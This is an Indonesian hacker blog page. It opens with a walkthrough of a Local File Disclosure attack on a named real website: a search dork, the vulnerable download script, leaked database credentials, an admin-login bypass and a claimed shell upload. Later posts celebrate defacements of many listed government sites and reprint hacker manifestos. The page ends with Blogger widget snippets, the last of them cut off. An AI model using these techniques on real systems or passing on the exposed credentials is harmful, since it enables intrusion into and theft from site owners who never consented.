exploit Bug LFD | profesor aka ZGoM91

Asalamualaiku wr wb. . . Hai berjumpa  dgn saya siganteng tiada taran & tampan sejagat raya r(^_^)r . . . kali ini saya ingin berbagi sedikit SESUATU tentang teknik yg di sebut Local File Disclosure/Download(LFD),nah sebelum kita mulai masbrow harus tau apa sih bug local file disclosure,hehehe walau saya belum tau benar tp saya ingin sok tau. LFD kurang lebh adalah celah Vulnerabiliy yg di sebabkan krna kesalah Code sehingga sang attacker bisa mendownload file2 sensitif seperti config.php yg ada di dlm suatu server, hehehe langsung aja deh keburu ngantuk. . r(^_^)r 


=================
Step 1
=================
Langsng masukan dork= inurl:download.php?file= dan tara buanyak . . .
Lalu saya coba satu persatu dan saya nemu situs yg mempunyai kelemahan bug (LFD)

http://pharmacos.in/download.php?file=sempak.pdf 

lalu saya ganti url belakang sempak.pdf dengan download.php jd gini

http://pharmacos.in/download.php?file=download.Php 

dan langsng saya download source dari download.php untuk mengetahui kenapa bisa tercipta Bug (LFD)

 <?phpheader('Content-type: application/octet-stream');header('Content-Length: ' . filesize($_REQUEST['file']));header('Content-Disposition: attachment; filename="'.basename($_REQUEST['file']).'"');readfile($_REQUEST['file']);?> 

nah dr kode tersbt si webmaster tdk memvalidasi shingga sang attcker bisa download file2 gntng.. 



=================
Step 2
=================

Setelah saya coba cari login admin panel akhirnya ketemu jga example :

http://sempak.in/admin/index.php 

langsung gpl tak dunlud source'n http://sempak.in/download.php?file=admin/index.php sukses 100% dan tara include_once("../connection.php"); sebenarnya mash ada lg yg ingin saya tunjukan tp sblm'na saya penasaran ama ../connection.php lngsung

http://sempak.in/download.php?file=connection.php 

suskses bongkar 

<?php /*$con=mysql_connect("localhost","root","");mysql_select_db("pharmacos",$con);*/$con=mysql_connect("67.228.4.124:3306","viraljain0","MERCURY");mysql_select_db("pharmacos",$con);?> 

wew ternyata isinya data login mysql yes. . lanjut. . .



=================
Step 3
=================

Eeettt hampir lupa tadi Q Blm selsai bongkar /admin/index.php sapa tau ada petunjuk yg lbh penting:D

session_start();$username=$_POST['username'];$password=$_POST['password'];$log=mysql_query("select * from admin_login where admin_name='$username' AND admin_password='$password'");$numsel=mysql_num_rows($log);if($numsel==1){$_SESSION['aname']=$username;?><script>location.href="adminmenu.php";</script><?php }else{?><script>alert("Please Insert Correct Information");location.href="#";</script><?php } 

dan benar brow isinya sesuatu perhatikn seksama 

[red]$numsel=mysql_num_rows($log);if($numsel==1){$_SESSION['aname']=$username; ?><script>location.href="adminmenu.php 

nah logikanya gini kita di suruh login dan data login di sambung ke mysql, jika memang data login benar di mysql maka kita akan di kirim ke http://sempak.in/admin/adminmenu.php tp kayake ada yg janggal ngapain kita login2 segala mendng lngsng aja http://sempak.in/admin/adminmenu.php wew. . Hehehe sukses masbrow MANCING MANIA MANTAP . . . ! Langsung deh si ganteng tiada tara masuk admin panel'e trs upload shell image,hehehe Josss. . . !


by me (profesor aka ZGoM91)

Share

Situs AVG Argentina di hack oleh hacker Indonesia

wew.,., dari pada ane bingung mo posting apa,, mending ane abadikan jha nie berita yang ane dapet infonya dari grup sebelah di blog ane  =))  . Antivirus AVG, pasti kk..kk kenal dengan antivirus interlocal yang satu ini. Situs Antivrus AVG di Argentina di hack, oleh hacker indonesia. Hakcer dengan nick name Hmei7 ini mencoba melakukan tes security pada situs tersebut dan ternyata berhasil.

MIrror : http://arg-kaspersky.com.ar/

Share

Surat untuk Presiden

Memang hebat sekarang Pemerintah., Pemerintah zaman sekarang bisa membuat Rakyat Indonesia bisa berfikir lebih keritis. Contoh saja Siswa kelas 4 SD di Jawah Tengah, dia bisa membuat surat ke pada Pak Presiden yang belum tentu saya bisa juga membuatnya. 

“Assalamualaikum.wr.wb bapak presiden yang terhormat saya kelas 4 SD di jawa tengah mau bilang tolong dong harga BBM jangan di naikkan, kasihan orangtua saya hanya bekerja sebagai seorang satpam yang gajinya cukup untuk makan sehari-hari saja, kalau BBM naik saya takut nanti biaya sekolah semakin mahal dan saya tidak bisa meneruskan sekolah ke jenjang yang lebih tinggi, tolong ya pak dipertimbangkan kembali. terimakasih. Wassalamualaikum.wr.wb.”

Surat itu ditujukan untuk bapak presiden dengan penuh rasa hormat dan pengungkapan secara halus. wah wah… anak SD saja sudah mampu berdemo dengan menggunakan tatacara Hablum Minannas. tidak seperti kakak - kakak yang sudah MAHAsiswa itu.. padahal sudah MAHA tapi kok tak memberi contoh yang baik ya??

siswa SD saja tau apa itu HablumMinannas, masa yang sudah MAHA tidak tahu apa itu Hablum Minannas sih? kasihan sekali kakak - kakak ini. seharusnya kalau sudah MAHA pasti lebih tahu dan pandai dong dari pada saya yang masih SD?

buat kakak - kakak yang sudah MAHA. kasihan adik - adik yang seperti saya ini . kalau kakak - kakak ngasih contohnya begitu nanti adik- adiknya nyontoh sikap seperti itu. anak kecilkan tidak pandai mendengar tapi pandai meniru. meniru apa yang didengar dan dilihat. kalau sudah ditiru seperti itu kapan mau menjadi bangsa yang punya education maju??

Sumber : http://metro.kompasiana.com

Share

Hacker Anonymous Ancam Akan Matikan Jaringan Internet Tanggal 31 Maret Besok

Group hacker paling fenomenal di dunia, Anonymous, kembali membuat ulah, kali ini mereka berencana untuk mematikan jaringan internet pada hari Sabtu tanggal 31 Maret 2012.

Aksi tersebut dilakukan sebagai bentuk protes terhadap SOPA, Wallstreet dan para pemimpin dunia yang dianggap tidak bertanggungjawab serta para bankir yang dinilai rakus dan memperkaya diri sendiri.

Mereka secara lantang mengatakan ““Tolong diingat, ini adalah bentuk protes, kami tidak berusaha ‘membunuh’ internet, kami hanya mematikannya sementara waktu di titik yang paling penting.”

Anonymous dinilai bisa melakukan gangguan internet lokal tapi hal tersebut diperkirakan akan dipusatkan pada jaringan tempat mesin hacking utama mereka berada. Anonymous diperkirakan akan mematikan server inti DNS sehingga membuat situs-situs tidak dapat diakses.

Para pakar keamanan internet dari Errata Security mengatakan bahwa aksi seperti itu memang efektif tapi tidak ada hal yang perlu dikhawatirkan. Bahkan Robert Graham mengatakan bahwa tidak mungkin Anonymous bisa mematikan seluruh jaringan internet secara bersamaan dalam waktu yang sama.

Namun tidak ada yang tidak mungkin dalam dunia teknologi, kita lihat saja bagaimana aksi Anonymous pada tanggal 31 Maret nanti.

Sumber : berita tekhnologi.com

Share

Manifesto Hacker | .luca-mercatanti.com

"Saya melakukannya untuk kesenangan menciptakan sesuatu, untuk melihat apa yang berhasil dan menciptakan sesuatu yang mampu bertahan, menyebar dan terus bereplikasi. 

Virus adalah seperti makhluk hidup. 

Dalam kehidupan nyata Anda tidak dapat membuat jenis baru hewan. Dalam komputer. Dan 'cara bermain Tuhan " 

BIRU OWL, anggota Front Libertion Rangers Siap

Orang percaya bahwa hacker adalah tokoh berbahaya, harus dihindari karena mereka mencuri informasi atau menanggung kerusakan pada sistem.

Label ini adalah salah sama sekali, itu adalah ide yang lahir dari orang bodoh yang tidak diberitahu dan telah jatuh cedera.

Aku mengakui bahwa ada hacker "buruk", tetapi ada sangat sedikit, atau bahkan mereka tidak, tetapi anak-anak akan menikmati melakukan begitu banyak kerusakan demi bermegah potersene dengan teman.

Orang-orang selalu takut apa yang mereka tidak mengerti apa yang tidak kita tahu. Beberapa label kita sebagai teroris, seperti penjahat.

Kita melakukannya ketika kita masuk ke dalam sistem hanya untuk kemudian memberitahu pemilik sistem yang mana masalahnya terletak, sehingga pemilik dapat mengambil langkah dan tidak akan mengambil risiko bahwa seseorang dengan keberatan beberapa buruk akan membahayakan sistem.

Selain itu, spread yang lebih besar dalam keyakinan bahwa hacker adalah "buruk" adalah dalam ketidaktahuan media dan pemerintah.

Media cenderung untuk kredit kata sifat palsu untuk Hacker, namun pemerintah cenderung memperburuk Para tanin adalah pergi ke sistem dengan hacker, meskipun pada kenyataannya sistem yang ditabrak tidak kehilangan sepeser pun.

Contoh nyata adalah Kevin D. Mitnick, hacker paling terkenal di dunia, yang sekarang bekerja di sebuah perusahaan keamanan:

Dia disalahkan karena membawa kerugian bagi perusahaan telepon untuk berbagai jutaan dolar, bahkan jika ia melanggar sistem tersebut hanya untuk rasa ingin tahu dan TIDAK untuk mencuri ide-ide mereka dan menjualnya ke perusahaan saingan.

Sebelum mengakhiri saya ingin mengatakan satu hal lalu.

Ada keamanan perusahaan yang dipekerjakan oleh perusahaan untuk menguji dan tweak tingkat keamanan di berbagai komputer, server, dll ...

Anda harus tahu bahwa hampir semua karyawan yang melakukan tes atau Hacker Hacker mantan yang memutuskan untuk peroleh dari pengetahuan dan keterampilan.

Kursus ini tidak ditentukan karena yang terakhir mungkin waspada terhadap label negatif di rumah yang dikreditkan ke Hacker.

Selain itu, Hacker tidak hanya mengeksplorasi jaringan komputer, tapi apa pun yang Anda mengajukan pertanyaan, bahkan membongkar lemari es dan memahami cara kerjanya tanpa membaca manual menjadi Hacker, bahkan lebih jika Anda bisa memasang kembali itu sendiri.

Orang hanya mengatakan kata hacker, yang segera masuk ke dalam pikiran tokoh buruk, yang tinggal di jalanan gelap atau di bawah bumi dan selalu terpaku pada monitor komputer berusaha merusak pemerintah, bisnis, rumah sakit, dll ...

Hacker sebenarnya orang yang sangat normal, biasanya remaja berusia 14 dan lebih.

Seperti yang kita semua pergi ke sekolah, dijalankan oleh sepeda motor atau sepeda, melakukan pekerjaan rumah, pergi dengan teman-teman, hacker dapat dengan mudah menjadi orang yang berdiri di samping Anda di gereja pada hari Minggu, mungkin di depan Anda dalam antrean di toko, bank, mail, dll ...

Hacker adalah orang yang meminta pertanyaan yang melampaui mereka yang orang biasa lakukan.

Hacker adalah orang yang sangat normal, anak laki-laki, perempuan, pria, wanita, Anda tidak dapat memahami itu atau tidak.

Original post : http://www.luca-mercatanti.com/il-mio-manifesto-hacker/

Share

The Mentor Manifesto

The Mentor

Ini adalah dunia kami sekarang, dunianya elektron dan switch, keindahan sebuah baud. Kami

mendayagunakan sebuah system yang telah ada tanpa membayar, yang bisa jadi biaya tersebut

sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut

kami kriminal.

Kami menjelajah, dan kalian sebut kami kriminal.

Kami mengejar pengetahuan, dan kalian sebut kami kriminal.

Kami hadir tanpa perbedaan warna kulit, kebangsaan, ataupun prasangka keagamaan, dan kalian

sebut kami kriminal.

Kalian membuat bom atom, kalian mengejar peperangan, kalian membunuh, berlaku curang,

membohongi kami dan mencoba menyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja

kami yang disebut kriminal.

Ya, aku memang kriminal.

Kejahatanku adalah rasa keingintahuanku.

Kejahatanku adalah menilai orang lain dari apa yang mereka katakan dan pikirkan, bukan pada

penampilan mereka.

Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak kalian maafkan.

Aku memang seorang hacker, dan inilah manifesto saya.

Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua.

Bagaimanapun juga, kami semua senasib seperjuangan.

Share

BINUS HACKER MANIFESTO

BINUS HACKER MANIFESTO

MANIFESTO HACKER INDONESIA

- The 1st Indonesian Hacker Manifesto -

Hacker, Kami Suka Dengan Kata Ini. Sejak Kami Kenal Internet Kami Sudah Suka Dengan Kata Hacker. Terserah Anda Mau Bilang Kami Apa, Yang Jelas Kami Bangga Menjadi Hacker.

Ya! Itulah Kami, Hacker Adalah Sebuah Impian Dan Imajinasi Tanpa Batas. Yang Setiap Orang Mungkin Tidak Bisa Memilikinya.

Hacker, Ya Itu Kami, Karena Dengan Kata Itulah Kami Mau Belajar, Setidaknya Bisa Belajar Sendiri. Sebab Di Sekolah, Kampus, Dan Di Lembaga Ilmu Pendidikan Kami Hanya Sedikit Mendapatkan Ilmu. Apa Gunanya Kalau Bisanya Cuma: “Tolong Itu Di Pelajari Sendiri Ya?”. Lebih Baik Kami Terinspirasi Dengan Kata HackerYang Membuat Kami Maju Dan Semangat Untuk Belajar Dan Belajar Lagi. Orang Bodoh Sekalipun Pasti Mau Belajar Kalau Mendengar Kata Hacker. Sampai Kami Sendiri Sering Mendengar: “Bagaimana  Sih Caranya Menjadi Hacker“. Ya! Itulah Kami, Inspirasi Tanpa Batas Dengan Menjadi Hacker.

Kami Hacker! Kami Tidak Peduli Apa Kata Orang, Yang Jelas Kami Tahu Sendiri Itu Ada Dalam Diri Kami. Inilah Perjuangan Kami, Inilah Takdir Kami, Inilah Jalan Kami, Inilah Darah Kami, Inilah Pikiran Kami Dan Inilah Kehidupan Kami.

Dunia Maya Itu Luas Bung, Jangan Pernah Mengambil Sesuatu Dari Sebuah Persepsi Dan Menyalahkan Kami Sebagai Hacker! Sekali Lagi, Dunia Maya Itu Luas Dan Ini Dunia Global Bung! Bukan Hanya Dunia Milikmu! Kami Bebas Melakukan Apa Yang Kami Inginkan Di Internet. Karena Dunia Kami Adalah Dunia Maya Dan Dunia Open Source.

Hidup Kami Antara 0 Dan 1, Dimana Dengan Dua Hal Tersebut Kami Menemukan Partikel Partikel Dunia Visual. Dengan 0 Dan 1 Kita Bisa Mengkonversi Pikiran Kita Menjadi Lebih Bervariasi Dan Inovasi Yang Tak Kenal Henti. Kami Adalah Genetika Yang Yang Tak Pernah Lelah Untuk Berusaha Mencari Apa Saja Yang Bisa Kami Angkat Untuk Dijadikan Bahan Uji Coba Demi Memaksimalkan Ide Yang Ada Di Pikiran Kami. Kami Adalah Sekelompok Orang Yang Tak Akan Pernah Melepas Suatu Kesempatan Untuk Dilewatkan Dan Kami Tak Akan Pernah Lelah Untuk Mencoba Serta Terus Mencoba.

Kami Bisa Masuk Komputer Orang, Kami Bisa Akses Komputer Orang, Kami Bisa Oprek Komputer, Kami Bisa Bikin Program, Kami Bisa Melakukan Apa Yang Anda Tidak Bisa Lakukan. Lantas Kenapa? Apa Salah Kami? Kemudian Anda Bilang Kami Kriminal? Anda Salah Besar Bung! Inilah Dunia Kami Yang Penuh Keingintahuan Tentang Ilmu Pengetahuan. Inilah Kriminal Yang Anda Salah Artikan, Kriminal Yang Sebenarnya Telah Terukir Di Kepala Anda Kalau Hacker Adalah Kejahatan! Karena Anda Tidak Tahu Dan Tidak Mengerti Sama Sekali Tentang Kami. Perhatikan Kami Bung, Inilah Kami Yang Anda Sebut Sebagai Para Kriminal, Yang Tidak Pernah Melakukan Kekerasan, Yang Haus Akan Pembelajaran, Yang Menginginkan Kemajuan, Yang Memiliki Motivasi Dan Persahabatan.

Kami Ingin Bebas Dalam Berkomunikasi Dan Menggunakan Informasi, Bebas Menganalisa Code Dan Script. Bebas Bertukar, Belajar, Berbagi Dan Membagi Antara Satu Dengan Yang Lainnya. Inilah Kami, Yang Akan Menggunakan Otak Kami Untuk Menemukan Sesuatu Yang Belum Anda Temukan. Kami Ingin Bebas Dalam Berselancar Di Dunia Maya, Sehingga Tidak Ada Sesuatu Apapun Yang Bisa Menghalagi Keinginan Kami Untuk Mencari, Menemukan, Memberi, Dan Memanfaatkan Apa Yang Kami Yakini. Kami Juga Menginginkan Kebebasan Dalam Mengeksplore Ide Ide Kami. Menjelajahi Bit Bit Dunia Maya Yang Tanpa Batas, Sehingga Membuka Lebar Cakrawala Ilmu Pengetahuan Bagi Kami, Anda Dan Semua Orang.

Inilah Definisi Tentang Hacker Yang Perlu Anda Pahami:
Hacker adalah sebutan untuk mereka yang menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software. Hasil pekerjaan mereka biasanya dipublikasikan secara luas dengan harapan sistem atau software yang didapati memiliki kelemahan dalam hal keamanan dapat disempurnakan di masa yang akan datang.

Dan Dengar Sahabat, We Are Hacker! Ini Adalah Manifesto Kami. Kebesaran Seseorang Tidak Terlihat Ketika Dia Berdiri Dan Memberi Perintah, Tetapi Ketika Dia Berdiri Sama Tinggi Dengan Orang Lain Dan Membantu Orang Lain Tersebut Untuk Mengeluarkan Yang Terbaik Dari Diri Mereka Untuk Mencapai Kesuksesan Bersama². Dan Ingat Sahabat! Jika Anda Bertemu Dengan Hacker, Cracker, Coder, Blogger, Defacer, Virus Creator Dan Cyber Lainnya Yang Katanya Kriminal Cyber! Percayalah, Bahwa Sesungguhnya Anda Telah Bertemu Dengan KAUM INTELEKTUAL Yang Belum Anda Ketahui.

ßïñüsHåçkêr Mäñîfëstõ Crêåtëd & Püblîshëd Bÿ Utüh Wîßõwö

Thë Fïrst Iñdôñësïâñ Håçkër Mäñîfëstõ

MANIFESTO HACKER INDONESIA

Share

Situs Partai Demokrat Gorontalo di hack ,

Mengatas namakan Hak Rakyat Indonesia, salah satu hacker dengan nick name ENno Lakoro mencoba untuk mengapresiasikan keluhan rakyat kecil, yang merasa Haknya di renggut oleh para Penguasa. tidak tanggung-tanggung, situs Partai Demokrat Gorontalo ia deface. dalam situs yang ia deface tersebut, terpampang jelas pesan yang ia sampaikan. Bahwa ia benar-benar memperdulikan Hak Rakyat. berikut pesan yang ia sampaikan :

Klik show untuk membuka kk..

“01 April 2012?

Ingatlah dalam sejarah hidupmu, bahwa pada tanggal itu “penguasa” bangsa ini akan merampas hak rakyat kecil dengan menaikan harga BBM,
yang membuat mereka kelimpunga, terhimpit beban ekonomi yang kian berat.

Ingatlah, bahwa tanggal itu di bangsa ini sedang diproklamirkan “kemerdekaan” ekonomi kapatilisme dan neoimprealisme Barat yang merongrong “demokrasi ekonomi” nasional
yang pro rakyat kecil.

Tidak kata lain untuk, “LAWAN PENZALIMAN PENGUASA TERHADAP RAKYAT KECIL…!”

Satu PUISI yang kamu tulis di FB, Blog, Twitter, SMS dan media jejaring sosial lainnya lebih panas dan pedasnya dibandingkan dengan lemparan batu atau molotov.

Lawan kenaikan BBM dengan PUISI…!

Hari-hari menjelang 01 April… adalah LAWAN, LAWAN dan LAWAN penguasa yang tanpa hati nurani…!

contact me : xCrootZ@gma _

Mirror : http://demokrat.gorontalo.web.id/

Share

Bąribųťz ḨuǸť RiFƫ beraksi tolak kenaikan BBM

Memang hebat hacker yang satu ini, langsung aja y simak situs-situs yg kk Bąribųťz ḨuǸť RiFƫ  deface,


http://sanggau.go.id/
http://www.saburaijuakab.go.id/
http://payakumbuhkota.go.id/
http://perpustakaan.pa-slemankab.go.id/
http://pa-slemankab.go.id/
http://pa-sambas.go.id/
http://bempoltesa.com/
http://pykbarat.payakumbuhkota.go.id/
http://pyktimur.payakumbuhkota.go.id/
http://latina.payakumbuhkota.go.id/
http://pykutara.payakumbuhkota.go.id/
http://rahmi.payakumbuhkota.go.id/
http://kpu.payakumbuhkota.go.id/
http://mifpoltesa.net/
http://kppt.payakumbuhkota.go.id/
http://dprd.payakumbuhkota.go.id/
http://dppka.payakumbuhkota.go.id/
http://ver2.pa-slemankab.go.id/
http://disdukcapil.payakumbuhkota.go.id/
http://adminemail.payakumbuhkota.go.id/
http://arda.sanggau.go.id/
http://bappeda.sanggau.go.id/
http://bawasda.sanggau.go.id/
http://bkd.sanggau.go.id/
http://bpkkd.sanggau.go.id/
http://blhkpk.sanggau.go.id/
http://camat.sanggau.go.id/
http://kependudukan.sanggau.go.id/
http://dprd.sanggau.go.id/
http://polpaja.sanggau.go.id/
http://setda.sanggau.go.id/
http://kupangkab.go.id/
http://www.nttprov.go.id/
http://kab-kupang.go.id/
http://provntt.nttprov.go.id/
http://forumlpsentt.nttprov.go.id/
http://distanbun.nttprov.go.id/
http://biroup.nttprov.go.id/
http://bkpmd.nttprov.go.id/
http://bkpm.nttprov.go.id/
http://arsipdaerah.nttprov.go.id/
http://kpde.kab-kupang.go.id/
http://kupang2010.kab-kupang.go.id/
http://newreal.kab-kupang.go.id/
http://englishweb.kab-kupang.go.id/
http://newkab.kab-kupang.go.id/
http://disbudpar.kab-kupang.go.id/
http://dprd.kab-kupang.go.id/

miror : http://gorontalo-defacer.org/profil/56/

Share

Tolak BBM naik, Situs pemerintah di Hack

Baru aja ane posting tentang penolakan BBM terhadap salah satu hacker favorit ane  Bąribųťz ḨuǸť RiFƫ, para mas[TER] yang lain juga gak mau kalah dengan kk  Bąribųťz ḨuǸť RiFƫ kali ini situs ptun-surabaya di deface oleh Hacker dengan nick name  Cbs Newbie Kng'crew  berikut sitenya  http://ptun-surabaya.go.id/x.htm  meskipun cuman satu site, tapi wow,,, amazing... pesan yang di tinggal dari hacker satu ini adalah :

CBS FEAT J0K3R_R3TURN

NEGARA INI BUKAN PUNYA BAPAK SAMA MAK LO DANJOK

MENAIKAN BBM SAMA DENGAN MEMBUNUH RAKYAT

WE ARE : Minang Cyber | Kng Crew |Indramayu Cyber| Salmin | The Day minangCyber | raptorc0der | b3gund4L | Zuand Binjay | Uni Sri Heker | Kaito Aka_tsutki | Soulsick | Dyaz Mati Rasa & You :P

 salam dari newbie kk' ,, ^_^,,--

Share

BBM naik , Hacker bertindak

Tidak hanya para mahasiswa saja yang menolak tentang kenaikan BBM dengan cara demonstrasi, salah satu hacker lokal favorit ane kk'  Bąribųťz ḨuǸť RiFƫ juga tidak mau ketinggalan. Tidak tanggung-tanggung, 17 site pemerintah ia deface. Ane yakin para Mas[TER]2 yang lain nya tidak mau kalah ma kk' Bąribųťz ḨuǸť RiFƫ, kita tinggal tunggu saja beberapa hari kemudian. ada yang lebih menghebohkan lagi atau tidak dari pada ini ,, ^_^,,--

 Berikut situs Pemerintah yang kk'  Bąribųťz ḨuǸť RiFƫ deface :

http://kupangkab.go.id/
http://www.nttprov.go.id/
http://kab-kupang.go.id/
http://provntt.nttprov.go.id/
http://forumlpsentt.nttprov.go.id/
http://distanbun.nttprov.go.id/
http://biroup.nttprov.go.id/
http://bkpmd.nttprov.go.id/
http://bkpm.nttprov.go.id/
http://arsipdaerah.nttprov.go.id/
http://kpde.kab-kupang.go.id/
http://kupang2010.kab-kupang.go.id/
http://newreal.kab-kupang.go.id/
http://englishweb.kab-kupang.go.id/
http://newkab.kab-kupang.go.id/
http://disbudpar.kab-kupang.go.id/
http://dprd.kab-kupang.go.id/

Dan ini SS nya :

Salam dari newbie kk' ^_^ :)

Share

GMJ, 2 Juta Aktivis dari 80 Negara Siap Masuk Al Quds

Koordinator Umum Global March to Jerusalem (GMJ), Dr. Ribhi Halum mengatakan, sekitar dua juta aktivis dari 80 negara siap menuju Al Quds, yang akan diberangkatkan dari empat negara Arab yang berdekatan dengan Palestina.


“Para delegasi internasional sudah berangkat dari negeri mereka masing-masing menuju negara-negara tersebut untuk ikut dalam GMJ yang akan diberangkatkan dari sana bertepatan dengan hari bumi Palestina yang jatuh pada tanggal 30 Maret," kata Halum.


Selain jumlah peserta yang mencapai dua juta, aksi internasional menentang yahudisasi Israel atas Jerusalem (Al Quds) itu juga diikuti sejumlah tokoh internasional dan tokoh non muslim.


“Para tokoh penting internasional akan ikut dalam pawai ini. Di antara mereka ada empat rabi Amerika dari kalangan Yahudi yang menentang pendudukan Israel dan menolak negara Israel. Mereka menentang keberadaan kuil yang diklaim Yahudi di kota al Quds, secara prinsip menolak keyahudian Palestina dan meyakini bahwa Palestina secara historis adalah milik orang-orang Palestina yang menjadi pemilik tanah,” tambah Halum.


“Pawai ini bertujuan untuk menyampaikan pesan jelas kepada penjajah Israel bahwa isu Palestina adalah isu umat dan seluruh dunia,” ujar pria yang berharap pawai ini menjadi titik tolak yang terang untuk mengembalikan isu Palestina sebagai isu sentral umat


Sementara itu, panitia Global March to Jerusalem (GMJ) sendiri sudah menyelesaikan persiapan teknis dan media untuk launching GMJ pada hari Jum’at (30/3) mendatang. [IK/IP

Sumber : bersamadakwah.com

Share

Membuat effect Zoom Image pada Postingan

Karena banyak yang tanya, bagaimana cara nya membuat Zoom Image pada setiap postingan kyk beginian nie,

 jadi postingan kali ini ane bakal kasih sourcenya . Kebetulan ane juga pke kyk yang begituan, jheheheee karena ini script CSS jadi naronya di CSS y untuk blogspot bisa di Rancangan~Perancang template~Tingkat lanjut~tambahkan CSS  ini untuk yang pke antarmuka blogger lawas, lok yang bru di template~ubahsuaikan~tingkat lanjut~tambahkan CSS

langsung sedot jha kk, salam dari newbie ^_^,,-- :)

.post img, table.tr-caption-container {

border:none;

max-width:560px;

height:auto;

-o-transition: all 0.5s;

-moz-transition: all 0.5s;

-webkit-transition: all 0.5s;

}

.post img:hover {

-o-transition: all 0.3s;

-moz-transition: all 0.3s;

-webkit-transition: all 0.3s;

-moz-transform: scale(1.5);

-o-transform: scale(1.5);

-webkit-transform: scale(1.5);

-webkit-border-radius: 36px 12px;

-moz-border-radius: 36px / 12px;

-webkit-box-shadow: 2px 2px 6px rgba(0,0,0,0.6);

}

 yang berwarna merah, itu ukuran zoom imagenya. bisa diganti sesuai dengan keinginan kk,

Share

Efek Tulisan pada Kursor

Kali ini ane akan berbagi cara memberikan efek tulisan pada kursor. efek tulisan yang dimaksud, itu efek seperti kursor pada blog ane. langsung aja y.. nie ane kasih sourcenya, tinggal copas jha, naronya di tambah gadget~html/javascript y,,
semoga bermanfaat !!!! salam dari newbie kk.. ^_^,,--

<script language="javascript">

var text='./ Welcome to my blog :: AnoN|03 ~~~~~~~~';

var delay=5;

var Xoff=0;

var Yoff=-30;

var txtw=10;

var beghtml='<font color="#FF0000"><b>';

var endhtml='</b></font>';

ns4 = (navigator.appName.indexOf("Netscape")>=0 && document.layers)? true : false;

ie4 = (document.all && !document.getElementById)? true : false;

ie5 = (document.all && document.getElementById)? true : false;

ns6 = (document.getElementById && navigator.appName.indexOf("Netscape")>=0 )? true: false;

var txtA=new Array();

text=text.split('');

var x1=0;

var y1=-50;

var t='';

for(i=1;i<=text.length;i++){

t+=(ns4)? '<layer left="0" top="-100" width="'+txtw+'" name="txt'+i+'" height="1">' : '<div id="txt'+i+'" style="position:absolute; top:-100px; left:0px; height:1px; width:'+txtw+'; visibility:visible;">';

t+=beghtml+text[i-1]+endhtml;

t+=(ns4)? '</layer>' : '</div>';

}

document.write(t);

function moveid(id,x,y){

if(ns4)id.moveTo(x,y);

else{

id.style.left=x+'px';

id.style.top=y+'px';

}}

function animate(evt){

x1=Xoff+((ie4||ie5)?event.clientX+document.body.scrollLeft:evt.pageX);

y1=Yoff+((ie4||ie5)?event.clientY+document.body.scrollTop:evt.pageY);

}

function getidleft(id){

if(ns4)return id.left;

else return parseInt(id.style.left);

}

function getidtop(id){

if(ns4)return id.top;

else return parseInt(id.style.top);

}

function getwindowwidth(){

if(ie4||ie5)return document.body.clientWidth+document.body.scrollLeft;

else return window.innerWidth+pageXOffset;

}

function movetxts(){

for(i=text.length;i>1;i=i-1){

if(getidleft(txtA[i-1])+txtw*2>=getwindowwidth()){

moveid(txtA[i-1],0,-100);

moveid(txtA[i],0,-100);

}else moveid(txtA[i], getidleft(txtA[i-1])+txtw, getidtop(txtA[i-1]));

}

moveid(txtA[1],x1,y1);

}

window.onload=function(){

for(i=1;i<=text.length;i++)txtA[i]=(ns4)?document.layers['txt'+i]:(ie4)?document.all['txt'+i]:document.getElementById('txt'+i);

if(ns4)document.captureEvents(Event.MOUSEMOVE);

document.onmousemove=animate;

setInterval('movetxts()',delay);

}

</script> 

Share

Beberapa Gadget Blogspot

Di sini ane akan bagi gadget2 blog yang ane pke di blog ane . meskipun gak seberapa menarik, tapi semoga jha bermanfaat deh,
salam Kenal dari newbie kk,, ^_^

1.JAM world:

<script src="http://www.clocklink.com/embed.js"></script><script type="text/javascript" language="JavaScript">obj=new Object;obj.clockfile="world001-gray.swf";obj.TimeZone="ICT";obj.width=400;obj.height=250;obj.wmode="transparent";showClock(obj);</script>

2.map:

<script type="text/javascript" src="http://jb.revolvermaps.com/r.js"></script><script type="text/javascript">rm_f1st('7','350','true','false','000000','1bx563vg1gt','true','007eff');</script><noscript><applet codebase="http://rb.revolvermaps.com/j" code="core.RE" width="350" height="350" archive="g.jar"><param name="cabbase" value="g.cab" /><param name="r" value="true" /><param name="n" value="false" /><param name="i" value="1bx563vg1gt" /><param name="m" value="7" /><param name="s" value="350" /><param name="c" value="007eff" /><param name="v" value="true" /><param name="b" value="000000" /><param name="rfc" value="true" /></applet></noscript>

 

3.gadget welcome:

<script language="JavaScript" src="http://adiwidget.com/js/adiWidget.js" type="text/javascript"></script><script language="JavaScript" type="text/javascript">eXl1lXc('http://www.adiwidget.com/flash/ahlan-2.swf','bottom','0px','right','0px','123196','150','300','transparent','ffffff');</script>

4.aktif:

<script src="http://h2.flashvortex.com/display.php?id=2_1295936530_34872_347_0_468_60_9_2_37" type="text/javascript"></script>

5.welcom.gif:

<a href="http://s1087.photobucket.com/albums/j476/esan_smansa/gifsmansa/?action=view&amp;current=welcome3.gif" target="_blank"><img src="http://i1087.photobucket.com/albums/j476/esan_smansa/gifsmansa/welcome3.gif" border="0" alt="Photobucket" /></a>

http://s1087.photobucket.com/albums/j476/esan_smansa

6.jumlah pengunjung:

<script src="http://scripts.widgethost.com/pax/counter.js?counter=ctr-fgkqij3vu2"></script>

<noscript><a href="http://www.pax.com/free-counters.html"><img src="http://counter.pax.com/counter/image?counter=ctr-fgkqij3vu2&noscript=1" alt="Free Hit Counter" border="0" /></a></noscript>

 

7.anti klik kanan:

<script> var message="HAyo.,.,.,!!!! Mo Copy-Paste Ya.,.,.?????";

///////////////////////////////////

function clickIE4(){if (event.button==2){alert(message);return false;}} function clickNS4(e){if (document.layers||document.getElementById&&!document.all){if (e.which==2||e.which==3){alert(message);return false;}}} if (document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS4;} else if (document.all&&!document.getElementById){document.onmousedown=clickIE4;} document.oncontextmenu=new Function("alert(message);return false")</script>

 

8.zig-zag(diatas<head>):

<script type='text/javascript'>

//<![CDATA[

scrW=screen.availWidth

scrH=screen.availHeight

window.resizeTo(10,10)

window.focus()

for(a=0;a<100;a++){

window.moveTo(0,0)

window.resizeTo(0,scrH*a/100)

}

window.resizeTo(0,0)

for(b=0;b<100;b++){

